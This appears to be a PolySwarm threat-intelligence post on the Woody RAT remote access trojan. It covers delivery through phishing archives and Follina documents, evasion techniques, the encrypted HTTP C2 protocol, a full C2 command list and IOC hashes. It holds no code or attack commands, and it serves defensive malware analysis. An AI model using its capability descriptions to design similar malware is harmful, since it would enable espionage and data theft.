Executive Summary
Malwarebytes recently reported on Woody RAT, a RAT being used to target entities in Russia.
Key Takeaways
- Woody RAT is a remote access trojan targeting entities in Russia.
- It is delivered via archive files or weaponized Office documents leveraging the Follina exploit.
- Woody RAT uses HTTP requests to communicate with the C2 and encrypts C2 communications.
What is Woody RAT?
Woody RAT is a newly discovered remote access trojan. According to Malwarebytes, it has been active in the wild for at least one year. Woody RAT is being delivered via phishing lures in archive file format and Office documents leveraging the Follina vulnerability. The threat actors behind Woody RAT targeted Obyedinyonnaya Aviastroitelnaya Korporatsiya (OAK), an aerospace and defense entity in Russia.
Woody RAT is disguised as an executable or application when delivered via archive files. Woody RAT is also delivered via Microsoft Office documents leveraging the Follina vulnerability, with lures pertaining to information security. Malwarebytes analysts noted Woody RAT employs anti-reversing techniques, as several of the CRT functions are statically linked. Prior to initialization, Woody RAT suppresses error reporting by calling SetErrorMode with the parameter set to 0x8007. Woody RAT uses multiple threads, so it allocates a global object and assigns a mutex to it to ensure no clashing operations can take place at the same time. This also ensures only one thread is contacting the C2 at a given time.
Woody RAT uses HTTP requests to communicate with the C2. These are described in more detail below. It also uses machine-specific values to derive a cookie to identify each victim machine. These values include adapter information, computer name and volume, and 8 random bytes appended to the value. To evade detection by network-based monitoring, Woody RAT uses a combination RSA-4096 and AES-CBC to encrypt C2 communications. After creating command threads, Woody RAT uses Process Hollowing to delete itself from the disk.
C2 HTTP Endpoint Requests
Woody RAT leverages multiple C2 HTTP endpoint requests, including the following:
- Knock - Woody RAT uses this as the first HTTP request sent to the C2. Woody RAT sends the machine-specific cookie described above. Data received as a response contains the URL path to submit additional information from the victim machine.
- Submit - Used to submit information about the victim machine. Data sent includes the OS, architecture, antivirus information, computer name, OS version, .NET information, PowerShell information, Python version and install path, storage drive information, environment variables, network interfaces, administrator privileges, running processes, proxy information, username, and a list of user accounts. Woody RAT currently detects six antivirus products - Avast Software, Doctor Web, Kaspersky, AVG, ESET, and Sophos.
- Ping - Woody RAT regularly pings the C2 with a GET http request and awaits the C2 response to determine which commands should be executed. These commands are listed in the next section.
C2 Commands
Woody RAT uses one thread to communicate with the C2 and another to execute commands. Woody RAT leverages events and mutex to synchronize between both threads.
_SET Commands include the following:
- PING - sets a sleep interval between every ping request
- PURG - the purpose of this command is unknown
- EXIT - exit command execution thread
_REQ Commands include the following:
- EXEC - executes the command received from the C2
- UPLD - uploads a file to the victim system
- INFO - submits information to the C2
- UPEX - uploads and executes a file received from the C2
- DNLD - lets the C2 download files from the victim system
- PROC - directly executes a process without using cmd.exe
- UPPR - uploads and executes a command
- SDEL - deletes files on the victim system
- _DIR - lists files and attributes in a directory
- STCK - allows the threat actor to execute a command stack of multiple commands with one request
- SCRN - takes a screenshot of the desktop
- INJC - process injection
- PSLS - retrieves an array of all running processes
- DMON - creates a process
- UPDM - allows the C2 to upload a process and then executes it using DMON
SharpExecutor and PowerSession Commands
Woody RAT has two embedded .DLL files. WoodySharpExecutor allows the malware to run .NET code received from the C2. WoodyPowerSession allows the malware to execute PowerShell commands and scripts received from the C2.
Commands leveraging these .DLL files include the following:
- DN_B - uses the RunBinaryStdout method to execute Assembly code with arguments received from the C2
- DN_D - gives the threat actor more control over execution
- PSSC - allows Woody RAT to receive and execute Base64 encoded PowerShell commands
- PSSS - allows Woody RAT to load and execute Base64 encoded PowerShell commands from the C2
- PSSM - allows Woody RAT to receive an array of Base64 encoded strings, including the module name and contents
IOCs
PolySwarm has multiple samples of Woody RAT.
B65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a
9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d
982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0
66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b
43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce
408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e
0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834
5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80
3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3
You can use the following CLI command to search for all Woody RAT samples in our portal:
$ polyswarm link list -f WoodyRat
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports